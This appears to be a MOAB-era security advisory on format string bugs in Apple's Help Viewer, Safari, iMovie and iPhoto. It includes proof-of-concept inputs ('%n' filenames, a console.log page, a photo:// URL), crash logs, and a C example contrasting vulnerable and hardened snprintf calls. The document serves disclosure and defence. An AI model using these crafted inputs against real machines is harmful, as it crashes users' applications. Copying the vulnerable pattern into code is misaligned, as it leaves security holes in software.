Summary
As MOAB begins to come to a close we have decided that it is time for a montage of some sort. By definition alone we can bring you nothing short of a closely juxtaposed composite of pure pwnage. Lucky for us, Apple's AppKit framework and a few Apple developers are all we need. Previously we have highlighted format string issues in Apple Installer, Software Update, iChat, and iPhoto. In today's montage we will add Apple's Help Viewer, Safari and iMovie to the list. Coincidentally, iPhoto will also be making a return visit.
Affected versions
The following versions were used during our testing:
Help Viewer 3.0.0 (144.1)
Safari 2.0.4 (419.3)
iMovie HD 6.0.3 (267.2)
iPhoto 6.0.5 (316)
Proof of concept, exploit or instructions to reproduce
As we have mentioned in past postings, the origins of these problems are related to the following functions from Apple's AppKit framework:
* NSBeginAlertSheet
* NSBeginCriticalAlertSheet
* NSBeginInformationalAlertSheet
* NSGetAlertPanel
* NSGetCriticalAlertPanel
* NSGetInformationalAlertPanel
* NSReleaseAlertPanel
* NSRunAlertPanel
* NSRunCriticalAlertPanel
* NSRunInformationalAlertPanel
* NSLog
Multiple developers of Apple-based software, including Apple's own developers, seem to have a misunderstanding of how to properly use the above functions: text of external origin (a file name, a URL, a string handed over from JavaScript) ends up as the format argument instead of as a value formatted by a fixed format. For the sake of lulz alone a montage must ensue...
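The same call shape, reduced to plain C, as an added illustration that is not code from this advisory or from Apple: every wrapper listed above ends in libSystem's vfprintf, so the defect and its fix look the same there. The block shows the vulnerable call beside the hardened one and adds a small directive counter that a code reviewer or a log monitor can run over untrusted names before (or after) they reach a format function. Function names, the 256-byte buffer and the sample strings are assumptions made for the example; the vulnerable function is present only for contrast and is never called.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern, shown for contrast only and never called below.
 * Untrusted text (a file name, a URL, console.log() output) is handed to
 * snprintf() as the FORMAT argument, exactly as the affected applications
 * hand it to NSRunAlertPanel()/NSBeginAlertSheet()/NSLog(). Conversion
 * directives inside that text are then parsed and acted upon, which is
 * the EXC_BAD_ACCESS inside __vfprintf seen in the crash logs. */
void alert_vulnerable(char *out, size_t n, const char *untrusted) {
    snprintf(out, n, untrusted);       /* gcc/clang: -Wformat-security warns here */
}

/* Hardened pattern: the format is a string literal and the untrusted text
 * is an ordinary argument, so its '%' characters are copied, not parsed. */
void alert_safe(char *out, size_t n, const char *untrusted) {
    snprintf(out, n, "%s", untrusted);
}

/* Review/detection aid: count printf-style conversion directives in text
 * that is about to be (or was) used as a format. "%%" is an escape, not a
 * directive. A non-zero count for text of external origin marks a call
 * site worth fixing; n_directives (may be NULL) receives the number of
 * "%n" directives, the ones a log monitor would single out. */
int count_format_directives(const char *s, int *n_directives) {
    int total = 0, n_count = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }          /* literal percent */
        const char *q = p + 1;
        /* skip flags, width, precision and length modifiers */
        while (*q && strchr("-+ #0123456789.hlLqjzt*", *q)) q++;
        if (*q == '\0') break;                       /* trailing lone '%' */
        total++;
        if (*q == 'n') n_count++;
        p = q;                                       /* resume after the conversion */
    }
    if (n_directives) *n_directives = n_count;
    return total;
}

/* Convenience wrapper: number of "%n" directives only. */
int count_n_directives(const char *s) {
    int n = 0;
    count_format_directives(s, &n);
    return n;
}

/* Returns 1 when the hardened call reproduces the untrusted text verbatim
 * (it must: with "%s" nothing in the text is interpreted). */
int safe_alert_preserves(const char *untrusted) {
    char out[256];                                   /* assumed buffer size */
    alert_safe(out, sizeof out, untrusted);
    return strcmp(out, untrusted) == 0;
}

int main(void) {
    /* Constructed sample with the same shape as the file names used above. */
    const char *sample = "%n%n%n%n%n%n%n%n%n%n%n.download";
    int n_dirs = 0;
    int total = count_format_directives(sample, &n_dirs);
    printf("directives=%d, %%n directives=%d\n", total, n_dirs);
    printf("hardened call keeps the text verbatim: %s\n",
           safe_alert_preserves(sample) ? "yes" : "no");
    return 0;
}
```

Compile with `-Wformat-security` (or `-Wformat=2`, which also enables `-Wformat-nonliteral`) and the vulnerable function is reported at build time; the same class of warning is what a code audit of the listed AppKit call sites would look for.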
Safari, iMovie and Help Viewer:
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Help Viewer.crash.log
Safari.crash.log
iMovie HD.crash.log
Safari:
joe-schmoes-computer:/tmp js$ cat test.html
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>
joe-schmoes-computer:/tmp js$ open test.html
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Safari.crash.log
iPhoto:
joe-schmoes-computer:/tmp js$ open 'photo://%25n%25n%25n%25n%25n%25n'
joe-schmoes-computer:/tmp js$ ls ~/Library/Logs/CrashReporter/
iPhoto.crash.log
Debugging Montage
iPhoto:
Version: 6.0.5 (6.0.5)
Build Version: 2
Project Name: iPhotoProject
Source Version: 3160000
PID: 874
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x925da956
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x92678e6c +[NSString localizedStringWithFormat:] + 129
6 com.apple.iPhoto 0x0002ae3a 0x1000 + 171578
7 com.apple.iPhoto 0x0031298f 0x1000 + 3217807
Safari:
Version: 2.0.4 (419.3)
Build Version: 7
Project Name: WebBrowser
Source Version: 4190300
PID: 455
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000020
Thread 0 Crashed:
0 libobjc.A.dylib 0x90a55380 objc_msgSend + 16
1 com.apple.AppKit 0x93364838 -[NSWindow(Sheets) _positionSheetConstrained:andDisplay:] + 278
2 com.apple.AppKit 0x9336785e -[NSMoveHelper(Sheets) _moveParent:andOpenSheet:] + 424
3 com.apple.AppKit 0x9336759a -[NSWindow(Sheets) _orderFrontRelativeToWindow:] + 168
4 com.apple.AppKit 0x9328f9ec -[NSWindow _reallyDoOrderWindow:relativeTo:findKey:forCounter:force:isModal:] + 2877
5 com.apple.AppKit 0x933389d8 -[NSApplication _orderFrontModalWindow:relativeToWindow:] + 1074
6 com.apple.AppKit 0x9333833a -[NSApplication _commonBeginModalSessionForWindow:relativeToWindow:modalDelegate:didEndSelecto$
7 com.apple.AppKit 0x93364f7d -[NSApplication beginSheet:modalForWindow:modalDelegate:didEndSelector:contextInfo:] + 122
8 com.apple.AppKit 0x9335f3bf _NXDoLocalRunAlertSheet + 922
9 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100
10 com.apple.Safari 0x0008300f 0x1000 + 532495
Help Viewer:
Version: 3.0.0 (144.1)
Build Version: 20
Project Name: HelpViewer
Source Version: 1440800
PID: 970
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x9a1ab5ac
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55
6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7 com.apple.AppKit 0x9335f2e0 _NXDoLocalRunAlertSheet + 699
8 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100
9 com.apple.helpui 0x9a1aca64 -[HelpViewController _displayAlertMessage:withInformativeText:] + 165
10 com.apple.helpui 0x9a1ab79e -[HelpViewController webView:unableToImplementPolicyWithError:frame:] + 512
iMovie HD:
Version: 6.0.3 (6.0.3)
Build Version: 14
Project Name: iMovieApp
Source Version: 2670200
PID: 1013
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000000
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55
6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7 com.apple.AppKit 0x934ac77a _NXDoLocalRunAlertPanel + 683
8 com.apple.AppKit 0x93588ad6 NSRunCriticalAlertPanel + 69
9 com.apple.iMovie 0x000f3f3e 0x1000 + 995134
10 com.apple.iMovie 0x000f3fcf 0x1000 + 995279
Safari (debug enabled):
defaults write com.apple.Safari IncludeDebugMenu 1
Version: 2.0.4 (419.3)
Build Version: 7
Project Name: WebBrowser
Source Version: 4190300
PID: 1042
Thread: 0
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x90a9755c
Thread 0 Crashed:
0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976
1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504
2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4 com.apple.Foundation 0x92605ab9 NSLogv + 85
5 com.apple.Foundation 0x926433a5 NSLog + 27
6 libobjc.A.dylib 0x90a58c56 objc_msgSendv + 54
7 com.apple.Foundation 0x925f443e -[NSInvocation invoke] + 932
8 com.apple.JavaScriptCore 0x9527deab KJS::Bindings::ObjcInstance::invokeMethod(KJS::ExecState*, KJS::Bindings::MethodList const&, KJS::List const&) + 1047
9 com.apple.JavaScriptCore 0x9527a220 KJS::RuntimeMethodImp::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 228
10 com.apple.JavaScriptCore 0x9523f77e KJS::Object::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 158
Notes
Exploitation conditions
All of these functions take a printf()-style format string, so text of external origin passed in that position has its conversion directives (such as %n) interpreted rather than displayed. Due to a bug in CoreFoundation, these issues are currently difficult to exploit for code execution.
Workaround or temporary solution
Seek out Landon Fuller and he shall destroy all that is evil!
All your AlertPanel are belong to us.